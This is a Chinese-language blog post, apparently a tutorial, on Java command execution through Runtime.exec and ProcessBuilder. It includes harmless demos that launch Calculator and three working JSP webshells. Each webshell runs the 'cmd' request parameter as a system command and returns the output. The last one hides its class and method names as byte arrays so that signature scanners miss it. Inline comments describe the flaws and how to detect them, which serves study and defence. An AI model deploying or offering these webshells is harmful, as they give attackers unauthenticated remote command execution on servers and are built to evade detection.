java命令执行函数:

  • Runtime.exec
  • ProcessBuilder
  • ProcessImpl
  • UNIXProcess

Runtime命令执行

Runtime命令执行应该是现在在java命令执行中使用的最多的一种方式。

package com.company;

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;


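public class Main {

    /**
     * Demonstrates command execution through {@code Runtime.exec(String)}.
     *
     * <p>The single-string overload splits the command on whitespace before
     * running it, so an argument containing a space cannot be passed this way.
     * The command is hard-coded here; this overload must never receive
     * request-controlled input.
     *
     * @param args ignored
     * @throws Exception if the process cannot be started, its output cannot be
     *     read, or the wait is interrupted
     */
    public static void main(String[] args) throws Exception {
        String command = "open /System/Applications/Calculator.app";
        Process p = Runtime.getRuntime().exec(command);
        // Drain stdout BEFORE waitFor(): if the child fills the pipe buffer while
        // nobody reads it, the child blocks and waitFor() never returns.
        // stderr is not consumed here (Runtime.exec has no redirectErrorStream),
        // so a command that writes a lot to stderr can still stall.
        try (BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()))) {
            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line);
            }
        }
        p.waitFor(); // block until the command finishes
        if (p.exitValue() != 0) { // non-zero status: the command failed
            System.out.println("error");
        }
    }
}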

cmd-shell.jsp执行cmd代码如下

<%-- The raw "cmd" request parameter is handed straight to Runtime.exec(): an unauthenticated
     command-execution sink. The expression prints the Process object, not the command output.
     Detection: grep JSPs for exec(request.getParameter and similar request-to-exec flows. --%>
<%=Runtime.getRuntime().exec(request.getParameter("cmd"))%>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>

<%-- Same sink as above, but this version relays the command's stdout back to the client.
     No authentication, no input validation: any request with a "cmd" parameter runs a process
     under the servlet container's account. --%>
<%
    // Runtime.exec(String) whitespace-splits the parameter value into argv.
    InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(in));
        String s = null;
        // Output is written into the page unescaped, wrapped in <pre>.
        while ((s = reader.readLine()) != null) {
            out.write("<pre>"+s+"</pre>");
        }
%>

image
查看下exec触发的底层源码
Runtime.java

image

ProcessBuilder.java

image

ProcessBuilder

package com.company;

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

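public class Main {

    /**
     * Demonstrates command execution through {@link ProcessBuilder}.
     *
     * <p>Unlike {@code Runtime.exec(String)}, ProcessBuilder takes an explicit
     * argument list, so the shell-style string is tokenized here before it is
     * passed on. Each token becomes exactly one argv element; no shell is
     * involved.
     *
     * @param args ignored
     * @throws Exception if the process cannot be started, its output cannot be
     *     read, or the wait is interrupted
     */
    public static void main(String[] args) throws Exception {
        String command = "open /System/Applications/Calculator.app";
        // Split on single spaces: one token per argv element.
        List<String> lcommand = new ArrayList<>(Arrays.asList(command.split(" ")));

        ProcessBuilder processBuilder = new ProcessBuilder(lcommand);
        // Merge stderr into stdout so a single reader drains both pipes.
        processBuilder.redirectErrorStream(true);
        Process p = processBuilder.start();
        // Drain the merged stream before waiting: an unread, full pipe blocks the child.
        try (BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()))) {
            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line);
            }
        }
        if (p.waitFor() != 0) { // non-zero status: the command failed
            System.out.println("error");
        }
    }
}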

image

shell.jsp

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%-- ProcessBuilder variant of the same sink. getParameterValues("cmd") returns every repeated
     "cmd" query parameter as one String[], and each element becomes one argv entry, which is
     why the example URL repeats cmd= three times. Detection: ProcessBuilder constructed directly
     from request data. --%>
<%
    InputStream p = new ProcessBuilder(request.getParameterValues("cmd")).start().getInputStream();
    BufferedReader bs = new BufferedReader(new InputStreamReader(p));

    String line = null;
    // stdout only; stderr is not redirected here, so error output is never shown.
    while ((line = bs.readLine()) != null) {
        out.write("<pre>" + line + "</pre>");
    }
%>

url: /shell.jsp?cmd=/bin/sh&cmd=-c&cmd=ls
image

稍微处理下

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.util.List" %>
<%@ page import="java.util.Scanner" %>
<%@ page import="java.util.ArrayList" %>
<%-- Obfuscated variant: the class and method names are built from byte arrays and resolved
     reflectively, so the literal strings "ProcessBuilder" and "start" never appear in the file.
     Signature scanners keyed on those literals miss it; detect instead on the behaviour
     (Class.forName on a byte-array string, getMethod(...).invoke on a reflectively created
     instance, request data flowing into a List passed to a constructor). --%>
<%
    String str = request.getParameter("cmd");  
    List<String> list = new ArrayList<>();  
    // argv: /bin/bash -c <parameter>, i.e. the parameter is interpreted by a shell.
    list.add("/bin/bash");            
    list.add("-c");  
    list.add(str); 
    // Bytes decode to "java.lang.ProcessBuilder".
    String rt = new String(new byte[]{106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 80,114,111,99,101,115,115,66,117,105,108,100,101,114});
    Class PB = Class.forName(rt); 
    // Bytes decode to "start". getDeclaredConstructors()[0] relies on reflection returning the
    // List<String> constructor first; that ordering is not guaranteed by the JDK spec.
    Process s = (Process) PB.getMethod(new String(new byte[]{115, 116, 97, 114, 116})).invoke(PB.getDeclaredConstructors()[0].newInstance(list));
    Scanner sc = new Scanner(s.getInputStream());        
    String result = "";        
    result = sc.hasNext() ? sc.next() : result;              
    out.println(result);    
%>

url: /shell.jsp?cmd=ls

最后修改:2021 年 02 月 15 日 01 : 41 PM